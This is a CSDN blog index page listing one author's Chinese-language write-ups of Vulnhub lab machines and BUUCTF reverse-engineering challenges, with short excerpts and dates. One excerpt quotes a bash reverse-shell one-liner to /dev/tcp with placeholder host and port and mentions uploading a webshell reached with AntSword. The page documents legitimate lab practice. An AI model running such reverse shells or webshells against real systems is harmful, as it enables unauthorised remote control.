Sombra_Olivia-优快云博客

经过查询资料之后发现是kali的编译版本太高了，靶机使用的版本是2.23，kali的版本为2.38。收获满满的，一开始是想用‘bash -i >& /dev/tcp/ip/port 0>&1 ’连接nc，但是反弹不出来，所以才写的一句话，结果没想到绕来绕去的还是用了蚁剑。不断思考，下载的POC没有问题，一定是编译的问题，编译改了版本仍然报错，是不是上传的文件有问题？上来就踩坑，还是用的小套路，扫描存活IP，结果扫了个寂寞，求助了大佬才知道，原来是靶机的设定网卡和运行使用的网卡不是一个。并存在site目录。

2025-01-16 15:30:45 823

原创 Vulnhub中的Earth

总的来讲，发现了新的IP（192.168.117.149），访问之后发现打不开，仔细看了nmap的扫描结果之后发现有DNS解析，所以在/etc/hosts文件中添加。运行reset_root发现运行失败，利用nc传到本地，利用strace执行reset_root后，发现需要三个文件，于是在靶机创建三个缺失的文件，再次执行reset_root。代码和答案都是正确的，我用的KALI跑出来是错的，但是不愿透露姓名的大佬表示他跑出来的是正确的。由nmap的结果可得知，IP开放了22，80，443。

2025-01-10 15:57:10 466

原创关于考CISP-PTE的那一小点心得

说实话，当我把题全做出来之后，我并没有太强的喜悦感，也许是我紧张过头了，毕竟考试前焦虑的失眠。直到看漫画中说：武术不是为了求胜，而是为了超越自我。参加天下第一武道会不是以胜利为目的，主要是为检测自己的实力和积累经验。从考证的角度说，虽然网上有说考PTE没啥含金量的，但是对于我这样从不会到会的来说还是有一定难度的。不过确实没感觉自己的水平有特别高的提高，所以为了提升自己的技术水平，还是要努力的学习才对，目前的想法是考虑考虑OSCP。

2024-04-29 19:37:36 1047 7

原创 BUUCTF中的JustRE 1

首先感谢师傅们的关注，小透明诚惶诚恐，如果在我成长的路上给师傅们带来一丢丢的帮助，将感到十分荣幸。

2024-01-15 11:09:42 572

原创 BUUCTF中的luck_guy

趁着空闲，摸鱼摸鱼，做道题。

2024-01-11 14:07:02 1145 2

原创 BUUCTF中的JAVA逆向解密1

也许是做题有效果了，至少这个题目有了思路，比之前强了不少。看了其它师傅的文章也学到了新的解题姿势，当然了，最重要的是有了写脚本的思路。目前遇到最大的坑还是写脚本这，一开始是用C语言写的，但是写完之后发现运行报错，也找不到原因。不难发现，这个程序的思路是用户输入的数据，通过一系列的运算之后，与KEY中的值做比较，如果一致，则输出Congratulations。”的运算之后，得到的值应该与KEY中相同，也就是说，KEY中的值经过“int result = arr[i] - 64 ^ 0x20”，就能得到结果。

2023-12-27 17:00:57 980 1

原创 BUUCTF中的不一样的Flag

越呆着心越慌，索性做道题压压惊。

2023-11-20 21:43:58 214 1

原创 BUUCTF中的reverse3

最近觉得正业有点坑，做点题缓解缓解心情。

2023-11-14 22:51:31 179

原创 BUUCTF中的HEllO WORLD

好不容易休息了，躺在床上睡了一整天。真不是我不行，996啊。

2023-11-11 19:15:51 410 2

原创 Buuctf中的XOR

最近突然忙起来了，忙里偷闲的做道题。

2023-11-08 22:12:53 374 2

原创 KALI 中安装docker及vulhub环境

在kali中搭建vulhub环境

2023-04-23 10:35:26 469

原创 BUUCTF中的“新年快乐”

今天看了一下日期，距过年还有28天，正好今天做的题目也叫新年快乐，就提前给大家拜个早年，祝大家早年幸福。

2022-12-23 16:06:40 1473 5

原创 BUUCTF中内涵的软件

又是一周，学了一周的汇编，到今天真的是一点儿都看不进去了，于是又做做题，找找自信。

2022-12-23 14:19:23 654

原创 BUUCTF中的reverse2

由于近日疫情比较严重，所以还是少出门，少聚集，多看书，多学习。今天来记录一下reverse2的解题过程。

2022-12-15 15:32:16 1638 4

原创 BUUCTF中的reverse1

BUUCTF中的reverse1

2022-11-28 10:26:13 1027 2

原创 BUUCTF题目：easyre

BUUCTF上的easyre

2022-11-25 12:09:08 973

原创 AI-WEB-1.0简单攻略

AI-WEB-1.0靶机的简单攻略

2022-07-17 12:35:49 2889

原创 i春秋-CTF-web文件上传

前言本来吧，悄悄摸鱼，想整点啥打发时间，看视频太明显，于是做做题，眉头紧锁，仔细思考，装作工作很难的样子。这回选择web类型的题目，主要是好久没做了，手有点生，找个简单的文件上传练练。打开题目环境发现：好像是没有什么特别的。但是往下翻看却是别有洞天。众所周知，php是后端语言，正常情况下前端是看不到的，也就是说，出题人还是很贴心的（虽然我觉得出题人没那么好心）。<?phpheader("Content-Type:text/html; charset=utf.

2022-04-27 13:54:27 1963

原创用虚拟机A访问虚拟机B中的Docker

用虚拟机A访问虚拟机B中的Docker序由于一直忙于工作，很久没有复现过漏洞，在最近做SRC的时候发现自己没什么思路，于是和师傅探讨了一下，师傅给的建议是先把VULHUB做一遍。记得之前师傅是建议用Ubantu搭载Docker进行复现的，但是笔者更倾向用Kali，所以就有了这样的一个插曲。特此做一个序章，一个是留做纪念，另外也希望遇到同样情况的伙伴们有一个解决的办法。1.谜雾重重由于对Linux和Docker不熟悉，在用Docker进行复现的时候最大的困难是找不到搭建环境的ip地址。

2021-12-30 15:37:27 1097

在Web和Reverse坑里游泳中。。。。

原创 Vulnhub中的ica1

原创 Vulnhub中的Thales

原创 Vulnhub中的Lupinone

原创 Vulnhub中的noob

原创 Vulnhub中的BREAKOUT

原创 Vulnhub中的napping 1.0.1

原创 Vulnhub中的Matrix-breakout2-Morpheus

原创 VULNHUB中的jangow01-1.0.1